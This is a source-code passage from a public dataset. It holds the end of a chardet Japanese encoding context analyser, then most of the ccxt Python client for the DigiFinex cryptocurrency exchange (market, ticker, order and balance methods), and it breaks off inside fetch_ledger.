# If this flag is set to True, detection is done and conclusion has
# been made
self._mDone = False
def feed(self, aBuf, aLen):
if self._mDone:
return
        # The buffer we got is byte oriented, and a character may span more than
        # one buffer. If the last one or two bytes of the previous buffer did not
        # form a complete character, we recorded how many bytes are needed to
        # complete it and skip those bytes here. We could record those bytes as
        # well and analyse the character once it is complete, but a single
        # character will not make much difference, so simply skipping it keeps
        # the logic simple and improves performance.
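        # Illustrative example (not from the original source): if a two-byte
        # character starts on the very last byte of a buffer, get_order() still
        # reports charLen == 2, so i overshoots aLen by one; that overshoot is
        # saved in self._mNeedToSkipCharNum and the continuation byte at the
        # start of the next buffer is skipped on the next feed() call.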
i = self._mNeedToSkipCharNum
while i < aLen:
order, charLen = self.get_order(aBuf[i:i + 2])
i += charLen
if i > aLen:
self._mNeedToSkipCharNum = i - aLen
self._mLastCharOrder = -1
else:
if (order != -1) and (self._mLastCharOrder != -1):
self._mTotalRel += 1
if self._mTotalRel > MAX_REL_THRESHOLD:
self._mDone = True
break
self._mRelSample[jp2CharContext[self._mLastCharOrder][order]] += 1
self._mLastCharOrder = order
def got_enough_data(self):
return self._mTotalRel > ENOUGH_REL_THRESHOLD
def get_confidence(self):
# This is just one way to calculate confidence. It works well for me.
if self._mTotalRel > MINIMUM_DATA_THRESHOLD:
return (self._mTotalRel - self._mRelSample[0]) / self._mTotalRel
else:
return DONT_KNOW
def get_order(self, aBuf):
return -1, 1
class SJISContextAnalysis(JapaneseContextAnalysis):
def __init__(self):
self.charset_name = "SHIFT_JIS"
def get_charset_name(self):
return self.charset_name
def get_order(self, aBuf):
if not aBuf:
return -1, 1
# find out current char's byte length
first_char = wrap_ord(aBuf[0])
if ((0x81 <= first_char <= 0x9F) or (0xE0 <= first_char <= 0xFC)):
charLen = 2
if (first_char == 0x87) or (0xFA <= first_char <= 0xFC):
self.charset_name = "CP932"
else:
charLen = 1
# return its order if it is hiragana
if len(aBuf) > 1:
second_char = wrap_ord(aBuf[1])
if (first_char == 202) and (0x9F <= second_char <= 0xF1):
return second_char - 0x9F, charLen
return -1, charLen
class EUCJPContextAnalysis(JapaneseContextAnalysis):
def get_order(self, aBuf):
if not aBuf:
return -1, 1
# find out current char's byte length
first_char = wrap_ord(aBuf[0])
if (first_char == 0x8E) or (0xA1 <= first_char <= 0xFE):
charLen = 2
elif first_char == 0x8F:
charLen = 3
else:
charLen = 1
# return its order if it is hiragana
if len(aBuf) > 1:
second_char = wrap_ord(aBuf[1])
if (first_char == 0xA4) and (0xA1 <= second_char <= 0xF3):
return second_char - 0xA1, charLen
return -1, charLen
# flake8: noqa
| bsd-3-clause |
ccxt/ccxt | python/ccxt/digifinex.py | 1 | 55044 | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import AccountSuspended
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import BadResponse
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidAddress
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import NetworkError
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import InvalidNonce
from ccxt.base.precise import Precise
class digifinex(Exchange):
def describe(self):
return self.deep_extend(super(digifinex, self).describe(), {
'id': 'digifinex',
'name': 'DigiFinex',
'countries': ['SG'],
'version': 'v3',
'rateLimit': 900, # 300 for posts
'has': {
'cancelOrder': True,
'cancelOrders': True,
'createOrder': True,
'fetchBalance': True,
'fetchCurrencies': True,
'fetchDepositAddress': True,
'fetchDeposits': True,
'fetchLedger': True,
'fetchMarkets': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchStatus': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchWithdrawals': True,
'withdraw': True,
},
'timeframes': {
'1m': '1',
'5m': '5',
'15m': '15',
'30m': '30',
'1h': '60',
'4h': '240',
'12h': '720',
'1d': '1D',
'1w': '1W',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87443315-01283a00-c5fe-11ea-8628-c2a0feaf07ac.jpg',
'api': 'https://openapi.digifinex.com',
'www': 'https://www.digifinex.com',
'doc': [
'https://docs.digifinex.com',
],
'fees': 'https://digifinex.zendesk.com/hc/en-us/articles/360000328422-Fee-Structure-on-DigiFinex',
'referral': 'https://www.digifinex.com/en-ww/from/DhOzBg?channelCode=ljaUPp',
},
'api': {
'public': {
'get': [
'{market}/symbols',
'kline',
'margin/currencies',
'margin/symbols',
'markets',
'order_book',
'ping',
'spot/symbols',
'time',
'trades',
'trades/symbols',
'ticker',
'currencies', # todo add fetchCurrencies
],
},
'private': {
'get': [
'{market}/financelog',
'{market}/mytrades',
'{market}/order',
'{market}/order/detail', # todo add fetchOrder
'{market}/order/current',
'{market}/order/history',
'margin/assets',
'margin/financelog',
'margin/mytrades',
'margin/order',
'margin/order/current',
'margin/order/history',
'margin/positions',
'otc/financelog',
'spot/assets',
'spot/financelog',
'spot/mytrades',
'spot/order',
'spot/order/current',
'spot/order/history',
'deposit/address', # todo add fetchDepositAddress
'deposit/history', # todo add fetchDeposits
'withdraw/history', # todo add fetchWithdrawals
],
'post': [
'{market}/order/cancel',
'{market}/order/new',
'{market}/order/batch_new',
'margin/order/cancel',
'margin/order/new',
'margin/position/close',
'spot/order/cancel',
'spot/order/new',
'transfer',
'withdraw/new', # todo add withdraw()
'withdraw/cancel',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.002,
'taker': 0.002,
},
},
'exceptions': {
'exact': {
                    '10001': [BadRequest, "Wrong request method, please check it's a GET or POST request"],
'10002': [AuthenticationError, 'Invalid ApiKey'],
'10003': [AuthenticationError, "Sign doesn't match"],
'10004': [BadRequest, 'Illegal request parameters'],
'10005': [DDoSProtection, 'Request frequency exceeds the limit'],
'10006': [PermissionDenied, 'Unauthorized to execute self request'],
'10007': [PermissionDenied, 'IP address Unauthorized'],
'10008': [InvalidNonce, 'Timestamp for self request is invalid, timestamp must within 1 minute'],
'10009': [NetworkError, 'Unexist endpoint, please check endpoint URL'],
'10011': [AccountSuspended, 'ApiKey expired. Please go to client side to re-create an ApiKey'],
'20001': [PermissionDenied, 'Trade is not open for self trading pair'],
'20002': [PermissionDenied, 'Trade of self trading pair is suspended'],
'20003': [InvalidOrder, 'Invalid price or amount'],
'20007': [InvalidOrder, 'Price precision error'],
'20008': [InvalidOrder, 'Amount precision error'],
'20009': [InvalidOrder, 'Amount is less than the minimum requirement'],
'20010': [InvalidOrder, 'Cash Amount is less than the minimum requirement'],
'20011': [InsufficientFunds, 'Insufficient balance'],
'20012': [BadRequest, 'Invalid trade type, valid value: buy/sell)'],
'20013': [InvalidOrder, 'No order info found'],
'20014': [BadRequest, 'Invalid date, Valid format: 2018-07-25)'],
'20015': [BadRequest, 'Date exceeds the limit'],
'20018': [PermissionDenied, 'Your trading rights have been banned by the system'],
'20019': [BadRequest, 'Wrong trading pair symbol. Correct format:"usdt_btc". Quote asset is in the front'],
'20020': [DDoSProtection, "You have violated the API operation trading rules and temporarily forbid trading. At present, we have certain restrictions on the user's transaction rate and withdrawal rate."],
'50000': [ExchangeError, 'Exception error'],
'20021': [BadRequest, 'Invalid currency'],
'20022': [BadRequest, 'The ending timestamp must be larger than the starting timestamp'],
'20023': [BadRequest, 'Invalid transfer type'],
'20024': [BadRequest, 'Invalid amount'],
'20025': [BadRequest, 'This currency is not transferable at the moment'],
'20026': [InsufficientFunds, 'Transfer amount exceed your balance'],
'20027': [PermissionDenied, 'Abnormal account status'],
'20028': [PermissionDenied, 'Blacklist for transfer'],
'20029': [PermissionDenied, 'Transfer amount exceed your daily limit'],
'20030': [BadRequest, 'You have no position on self trading pair'],
'20032': [PermissionDenied, 'Withdrawal limited'],
'20033': [BadRequest, 'Wrong Withdrawal ID'],
'20034': [PermissionDenied, 'Withdrawal service of self crypto has been closed'],
'20035': [PermissionDenied, 'Withdrawal limit'],
'20036': [ExchangeError, 'Withdrawal cancellation failed'],
'20037': [InvalidAddress, 'The withdrawal address, Tag or chain type is not included in the withdrawal management list'],
'20038': [InvalidAddress, 'The withdrawal address is not on the white list'],
'20039': [ExchangeError, "Can't be canceled in current status"],
'20040': [RateLimitExceeded, 'Withdraw too frequently; limitation: 3 times a minute, 100 times a day'],
'20041': [PermissionDenied, 'Beyond the daily withdrawal limit'],
'20042': [BadSymbol, 'Current trading pair does not support API trading'],
},
'broad': {
},
},
'options': {
'defaultType': 'spot',
'types': ['spot', 'margin', 'otc'],
},
'commonCurrencies': {
'BHT': 'Black House Test',
'EPS': 'Epanus',
'MBN': 'Mobilian Coin',
'TEL': 'TEL666',
},
})
def fetch_currencies(self, params={}):
response = self.publicGetCurrencies(params)
#
# {
# "data":[
# {
# "deposit_status":1,
# "min_deposit_amount":10,
# "withdraw_fee_rate":0,
# "min_withdraw_amount":10,
# "min_withdraw_fee":5,
# "currency":"USDT",
# "withdraw_status":0,
# "chain":"OMNI"
# },
# {
# "deposit_status":1,
# "min_deposit_amount":10,
# "withdraw_fee_rate":0,
# "min_withdraw_amount":10,
# "min_withdraw_fee":3,
# "currency":"USDT",
# "withdraw_status":1,
# "chain":"ERC20"
# },
# {
# "deposit_status":0,
# "min_deposit_amount":0,
# "withdraw_fee_rate":0,
# "min_withdraw_amount":0,
# "min_withdraw_fee":0,
# "currency":"DGF13",
# "withdraw_status":0,
# "chain":""
# },
# ],
# "code":200
# }
#
data = self.safe_value(response, 'data', [])
result = {}
for i in range(0, len(data)):
currency = data[i]
id = self.safe_string(currency, 'currency')
code = self.safe_currency_code(id)
depositStatus = self.safe_value(currency, 'deposit_status', 1)
withdrawStatus = self.safe_value(currency, 'withdraw_status', 1)
active = depositStatus and withdrawStatus
fee = self.safe_number(currency, 'withdraw_fee_rate')
if code in result:
if isinstance(result[code]['info'], list):
result[code]['info'].append(currency)
else:
result[code]['info'] = [result[code]['info'], currency]
else:
result[code] = {
'id': id,
'code': code,
'info': currency,
'type': None,
'name': None,
'active': active,
'fee': fee,
'precision': 8, # todo fix hardcoded value
'limits': {
'amount': {
'min': None,
'max': None,
},
'withdraw': {
'min': self.safe_number(currency, 'min_withdraw_amount'),
'max': None,
},
},
}
return result
def fetch_markets(self, params={}):
options = self.safe_value(self.options, 'fetchMarkets', {})
method = self.safe_string(options, 'method', 'fetch_markets_v2')
return getattr(self, method)(params)
def fetch_markets_v2(self, params={}):
response = self.publicGetTradesSymbols(params)
#
# {
# "symbol_list":[
# {
# "order_types":["LIMIT","MARKET"],
# "quote_asset":"USDT",
# "minimum_value":2,
# "amount_precision":4,
# "status":"TRADING",
# "minimum_amount":0.0001,
# "symbol":"BTC_USDT",
# "is_allow":1,
# "zone":"MAIN",
# "base_asset":"BTC",
# "price_precision":2
# }
# ],
# "code":0
# }
#
markets = self.safe_value(response, 'symbol_list', [])
result = []
for i in range(0, len(markets)):
market = markets[i]
id = self.safe_string(market, 'symbol')
baseId = self.safe_string(market, 'base_asset')
quoteId = self.safe_string(market, 'quote_asset')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
precision = {
'amount': self.safe_integer(market, 'amount_precision'),
'price': self.safe_integer(market, 'price_precision'),
}
limits = {
'amount': {
'min': self.safe_number(market, 'minimum_amount'),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(market, 'minimum_value'),
'max': None,
},
}
#
# The status is documented in the exchange API docs as follows:
# TRADING, HALT(delisted), BREAK(trading paused)
# https://docs.digifinex.vip/en-ww/v3/#/public/spot/symbols
# However, all spot markets actually have status == 'HALT'
# despite that they appear to be active on the exchange website.
# Apparently, we can't trust self status.
# status = self.safe_string(market, 'status')
# active = (status == 'TRADING')
#
isAllowed = self.safe_integer(market, 'is_allow', 1)
active = True if isAllowed else False
type = 'spot'
spot = (type == 'spot')
margin = (type == 'margin')
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': active,
'type': type,
'spot': spot,
'margin': margin,
'precision': precision,
'limits': limits,
'info': market,
})
return result
def fetch_markets_v1(self, params={}):
response = self.publicGetMarkets(params)
#
# {
# "data": [
# {
# "volume_precision":4,
# "price_precision":2,
# "market":"btc_usdt",
# "min_amount":2,
# "min_volume":0.0001
# },
# ],
# "date":1564507456,
# "code":0
# }
#
markets = self.safe_value(response, 'data', [])
result = []
for i in range(0, len(markets)):
market = markets[i]
id = self.safe_string(market, 'market')
baseId, quoteId = id.split('_')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
precision = {
'amount': self.safe_integer(market, 'volume_precision'),
'price': self.safe_integer(market, 'price_precision'),
}
limits = {
'amount': {
'min': self.safe_number(market, 'min_volume'),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(market, 'min_amount'),
'max': None,
},
}
active = None
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': active,
'precision': precision,
'limits': limits,
'info': market,
})
return result
def fetch_balance(self, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
type = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
method = 'privateGet' + self.capitalize(type) + 'Assets'
response = getattr(self, method)(params)
#
# {
# "code": 0,
# "list": [
# {
# "currency": "BTC",
# "free": 4723846.89208129,
# "total": 0
# }
# ]
# }
balances = self.safe_value(response, 'list', [])
result = {'info': response}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'currency')
code = self.safe_currency_code(currencyId)
account = self.account()
account['used'] = self.safe_string(balance, 'frozen')
account['free'] = self.safe_string(balance, 'free')
account['total'] = self.safe_string(balance, 'total')
result[code] = account
return self.parse_balance(result, False)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['limit'] = limit # default 10, max 150
response = self.publicGetOrderBook(self.extend(request, params))
#
# {
# "bids": [
# [9605.77,0.0016],
# [9605.46,0.0003],
# [9602.04,0.0127],
# ],
# "asks": [
# [9627.22,0.025803],
# [9627.12,0.168543],
# [9626.52,0.0011529],
# ],
# "date":1564509499,
# "code":0
# }
#
timestamp = self.safe_timestamp(response, 'date')
return self.parse_order_book(response, symbol, timestamp)
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.publicGetTicker(params)
#
# {
# "ticker": [{
# "vol": 40717.4461,
# "change": -1.91,
# "base_vol": 392447999.65374,
# "sell": 9592.23,
# "last": 9592.22,
# "symbol": "btc_usdt",
# "low": 9476.24,
# "buy": 9592.03,
# "high": 9793.87
# }],
# "date": 1589874294,
# "code": 0
# }
#
result = {}
tickers = self.safe_value(response, 'ticker', [])
date = self.safe_integer(response, 'date')
for i in range(0, len(tickers)):
rawTicker = self.extend({
'date': date,
}, tickers[i])
ticker = self.parse_ticker(rawTicker)
symbol = ticker['symbol']
result[symbol] = ticker
return self.filter_by_array(result, 'symbol', symbols)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.publicGetTicker(self.extend(request, params))
#
# {
# "ticker": [{
# "vol": 40717.4461,
# "change": -1.91,
# "base_vol": 392447999.65374,
# "sell": 9592.23,
# "last": 9592.22,
# "symbol": "btc_usdt",
# "low": 9476.24,
# "buy": 9592.03,
# "high": 9793.87
# }],
# "date": 1589874294,
# "code": 0
# }
#
date = self.safe_integer(response, 'date')
tickers = self.safe_value(response, 'ticker', [])
firstTicker = self.safe_value(tickers, 0, {})
result = self.extend({'date': date}, firstTicker)
return self.parse_ticker(result, market)
def parse_ticker(self, ticker, market=None):
#
# fetchTicker, fetchTickers
#
# {
# "last":0.021957,
# "symbol": "btc_usdt",
# "base_vol":2249.3521732227,
# "change":-0.6,
# "vol":102443.5111,
# "sell":0.021978,
# "low":0.021791,
# "buy":0.021946,
# "high":0.022266,
# "date"1564518452, # injected from fetchTicker/fetchTickers
# }
#
marketId = self.safe_string_upper(ticker, 'symbol')
symbol = self.safe_symbol(marketId, market, '_')
timestamp = self.safe_timestamp(ticker, 'date')
last = self.safe_number(ticker, 'last')
percentage = self.safe_number(ticker, 'change')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high'),
'low': self.safe_number(ticker, 'low'),
'bid': self.safe_number(ticker, 'buy'),
'bidVolume': None,
'ask': self.safe_number(ticker, 'sell'),
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': percentage,
'average': None,
'baseVolume': self.safe_number(ticker, 'vol'),
'quoteVolume': self.safe_number(ticker, 'base_vol'),
'info': ticker,
}
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {
# "date":1564520003,
# "id":1596149203,
# "amount":0.7073,
# "type":"buy",
# "price":0.02193,
# }
#
# fetchMyTrades(private)
#
# {
# "symbol": "BTC_USDT",
# "order_id": "6707cbdcda0edfaa7f4ab509e4cbf966",
# "id": 28457,
# "price": 0.1,
# "amount": 0,
# "fee": 0.096,
# "fee_currency": "USDT",
# "timestamp": 1499865549,
# "side": "buy",
# "is_maker": True
# }
#
id = self.safe_string(trade, 'id')
orderId = self.safe_string(trade, 'order_id')
timestamp = self.safe_timestamp_2(trade, 'date', 'timestamp')
side = self.safe_string_2(trade, 'type', 'side')
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string(trade, 'amount')
price = self.parse_number(priceString)
amount = self.parse_number(amountString)
cost = self.parse_number(Precise.string_mul(priceString, amountString))
marketId = self.safe_string(trade, 'symbol')
symbol = self.safe_symbol(marketId, market, '_')
takerOrMaker = self.safe_value(trade, 'is_maker')
feeCost = self.safe_number(trade, 'fee')
fee = None
if feeCost is not None:
feeCurrencyId = self.safe_string(trade, 'fee_currency')
feeCurrencyCode = self.safe_currency_code(feeCurrencyId)
fee = {
'cost': feeCost,
'currency': feeCurrencyCode,
}
return {
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': None,
'order': orderId,
'side': side,
'price': price,
'amount': amount,
'cost': cost,
'takerOrMaker': takerOrMaker,
'fee': fee,
}
def fetch_time(self, params={}):
response = self.publicGetTime(params)
#
# {
# "server_time": 1589873762,
# "code": 0
# }
#
return self.safe_timestamp(response, 'server_time')
def fetch_status(self, params={}):
self.publicGetPing(params)
#
# {
# "msg": "pong",
# "code": 0
# }
#
self.status = self.extend(self.status, {
'status': 'ok',
'updated': self.milliseconds(),
})
return self.status
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['limit'] = limit # default 100, max 500
response = self.publicGetTrades(self.extend(request, params))
#
# {
# "data":[
# {
# "date":1564520003,
# "id":1596149203,
# "amount":0.7073,
# "type":"buy",
# "price":0.02193,
# },
# {
# "date":1564520002,
# "id":1596149165,
# "amount":0.3232,
# "type":"sell",
# "price":0.021927,
# },
# ],
# "code": 0,
# "date": 1564520003,
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# [
# 1556712900,
# 2205.899,
# 0.029967,
# 0.02997,
# 0.029871,
# 0.029927
# ]
#
return [
self.safe_timestamp(ohlcv, 0),
self.safe_number(ohlcv, 5), # open
self.safe_number(ohlcv, 3), # high
self.safe_number(ohlcv, 4), # low
self.safe_number(ohlcv, 2), # close
self.safe_number(ohlcv, 1), # volume
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'period': self.timeframes[timeframe],
# 'start_time': 1564520003, # starting timestamp, 200 candles before end_time by default
# 'end_time': 1564520003, # ending timestamp, current timestamp by default
}
if since is not None:
startTime = int(since / 1000)
request['start_time'] = startTime
if limit is not None:
duration = self.parse_timeframe(timeframe)
request['end_time'] = self.sum(startTime, limit * duration)
elif limit is not None:
endTime = self.seconds()
duration = self.parse_timeframe(timeframe)
request['start_time'] = self.sum(endTime, -limit * duration)
response = self.publicGetKline(self.extend(request, params))
#
# {
# "code":0,
# "data":[
# [1556712900,2205.899,0.029967,0.02997,0.029871,0.029927],
# [1556713800,1912.9174,0.029992,0.030014,0.029955,0.02996],
# [1556714700,1556.4795,0.029974,0.030019,0.029969,0.02999],
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_ohlcvs(data, market, timeframe, since, limit)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
request = {
'market': orderType,
'symbol': market['id'],
'amount': self.amount_to_precision(symbol, amount),
# 'post_only': 0, # 0 by default, if set to 1 the order will be canceled if it can be executed immediately, making sure there will be no market taking
}
suffix = ''
if type == 'market':
suffix = '_market'
else:
request['price'] = self.price_to_precision(symbol, price)
request['type'] = side + suffix
response = self.privatePostMarketOrderNew(self.extend(request, params))
#
# {
# "code": 0,
# "order_id": "198361cecdc65f9c8c9bb2fa68faec40"
# }
#
result = self.parse_order(response, market)
return self.extend(result, {
'symbol': symbol,
'side': side,
'type': type,
'amount': amount,
'price': price,
})
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
request = {
'market': orderType,
'order_id': id,
}
response = self.privatePostMarketOrderCancel(self.extend(request, params))
#
# {
# "code": 0,
# "success": [
# "198361cecdc65f9c8c9bb2fa68faec40",
# "3fb0d98e51c18954f10d439a9cf57de0"
# ],
# "error": [
# "78a7104e3c65cc0c5a212a53e76d0205"
# ]
# }
#
canceledOrders = self.safe_value(response, 'success', [])
numCanceledOrders = len(canceledOrders)
if numCanceledOrders != 1:
raise OrderNotFound(self.id + ' cancelOrder ' + id + ' not found')
return response
def cancel_orders(self, ids, symbol=None, params={}):
self.load_markets()
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
request = {
'market': orderType,
'order_id': ','.join(ids),
}
response = self.privatePostCancelOrder(self.extend(request, params))
#
# {
# "code": 0,
# "success": [
# "198361cecdc65f9c8c9bb2fa68faec40",
# "3fb0d98e51c18954f10d439a9cf57de0"
# ],
# "error": [
# "78a7104e3c65cc0c5a212a53e76d0205"
# ]
# }
#
canceledOrders = self.safe_value(response, 'success', [])
numCanceledOrders = len(canceledOrders)
if numCanceledOrders < 1:
raise OrderNotFound(self.id + ' cancelOrders error')
return response
def parse_order_status(self, status):
statuses = {
'0': 'open',
'1': 'open', # partially filled
'2': 'closed',
'3': 'canceled',
'4': 'canceled', # partially filled and canceled
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# createOrder
#
# {
# "code": 0,
# "order_id": "198361cecdc65f9c8c9bb2fa68faec40"
# }
#
# fetchOrder, fetchOpenOrders, fetchOrders
#
# {
# "symbol": "BTC_USDT",
# "order_id": "dd3164b333a4afa9d5730bb87f6db8b3",
# "created_date": 1562303547,
# "finished_date": 0,
# "price": 0.1,
# "amount": 1,
# "cash_amount": 1,
# "executed_amount": 0,
# "avg_price": 0,
# "status": 1,
# "type": "buy",
# "kind": "margin"
# }
#
id = self.safe_string(order, 'order_id')
timestamp = self.safe_timestamp(order, 'created_date')
lastTradeTimestamp = self.safe_timestamp(order, 'finished_date')
side = self.safe_string(order, 'type')
type = None
if side is not None:
parts = side.split('_')
numParts = len(parts)
if numParts > 1:
side = parts[0]
type = parts[1]
else:
type = 'limit'
status = self.parse_order_status(self.safe_string(order, 'status'))
marketId = self.safe_string(order, 'symbol')
symbol = self.safe_symbol(marketId, market, '_')
amount = self.safe_number(order, 'amount')
filled = self.safe_number(order, 'executed_amount')
price = self.safe_number(order, 'price')
average = self.safe_number(order, 'avg_price')
return self.safe_order({
'info': order,
'id': id,
'clientOrderId': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': lastTradeTimestamp,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': None,
'amount': amount,
'filled': filled,
'remaining': None,
'cost': None,
'average': average,
'status': status,
'fee': None,
'trades': None,
})
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
self.load_markets()
market = None
request = {
'market': orderType,
}
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
response = self.privateGetMarketOrderCurrent(self.extend(request, params))
#
# {
# "code": 0,
# "data": [
# {
# "symbol": "BTC_USDT",
# "order_id": "dd3164b333a4afa9d5730bb87f6db8b3",
# "created_date": 1562303547,
# "finished_date": 0,
# "price": 0.1,
# "amount": 1,
# "cash_amount": 1,
# "executed_amount": 0,
# "avg_price": 0,
# "status": 1,
# "type": "buy",
# "kind": "margin"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_orders(data, market, since, limit)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
self.load_markets()
market = None
request = {
'market': orderType,
}
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
if since is not None:
request['start_time'] = int(since / 1000) # default 3 days from now, max 30 days
if limit is not None:
request['limit'] = limit # default 10, max 100
response = self.privateGetMarketOrderHistory(self.extend(request, params))
#
# {
# "code": 0,
# "data": [
# {
# "symbol": "BTC_USDT",
# "order_id": "dd3164b333a4afa9d5730bb87f6db8b3",
# "created_date": 1562303547,
# "finished_date": 0,
# "price": 0.1,
# "amount": 1,
# "cash_amount": 1,
# "executed_amount": 0,
# "avg_price": 0,
# "status": 1,
# "type": "buy",
# "kind": "margin"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_orders(data, market, since, limit)
def fetch_order(self, id, symbol=None, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
self.load_markets()
market = None
if symbol is not None:
market = self.market(symbol)
request = {
'market': orderType,
'order_id': id,
}
response = self.privateGetMarketOrder(self.extend(request, params))
#
# {
# "code": 0,
# "data": [
# {
# "symbol": "BTC_USDT",
# "order_id": "dd3164b333a4afa9d5730bb87f6db8b3",
# "created_date": 1562303547,
# "finished_date": 0,
# "price": 0.1,
# "amount": 1,
# "cash_amount": 1,
# "executed_amount": 0,
# "avg_price": 0,
# "status": 1,
# "type": "buy",
# "kind": "margin"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
order = self.safe_value(data, 0)
if order is None:
raise OrderNotFound(self.id + ' fetchOrder() order ' + id + ' not found')
return self.parse_order(order, market)
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
self.load_markets()
market = None
request = {
'market': orderType,
}
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
if since is not None:
request['start_time'] = int(since / 1000) # default 3 days from now, max 30 days
if limit is not None:
request['limit'] = limit # default 10, max 100
response = self.privateGetMarketMytrades(self.extend(request, params))
#
# {
# "code": 0,
# "list": [
# {
# "symbol": "BTC_USDT",
# "order_id": "6707cbdcda0edfaa7f4ab509e4cbf966",
# "id": 28457,
# "price": 0.1,
# "amount": 0,
# "fee": 0.096,
# "fee_currency": "USDT",
# "timestamp": 1499865549,
# "side": "buy",
# "is_maker": True
# }
# ]
# }
#
data = self.safe_value(response, 'list', [])
return self.parse_trades(data, market, since, limit)
def parse_ledger_entry_type(self, type):
types = {}
return self.safe_string(types, type, type)
def parse_ledger_entry(self, item, currency=None):
#
# {
# "currency_mark": "BTC",
# "type": 100234,
# "num": 28457,
# "balance": 0.1,
# "time": 1546272000
# }
#
id = self.safe_string(item, 'num')
account = None
type = self.parse_ledger_entry_type(self.safe_string(item, 'type'))
code = self.safe_currency_code(self.safe_string(item, 'currency_mark'), currency)
timestamp = self.safe_timestamp(item, 'time')
before = None
after = self.safe_number(item, 'balance')
status = 'ok'
return {
'info': item,
'id': id,
'direction': None,
'account': account,
'referenceId': None,
'referenceAccount': None,
'type': type,
'currency': code,
'amount': None,
'before': before,
'after': after,
'status': status,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'fee': None,
}
def fetch_ledger(self, code=None, since=None, limit=None, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
self.load_markets()
request = {
'market': orderType,
}
currency = None
if code is not None:
currency = self.currency(code)
request['currency_mark'] = currency['id']
if since is not None:
request['start_time'] = int(since / 1000)
if limit is not None:
request['limit'] = limit # default 100, max 1000
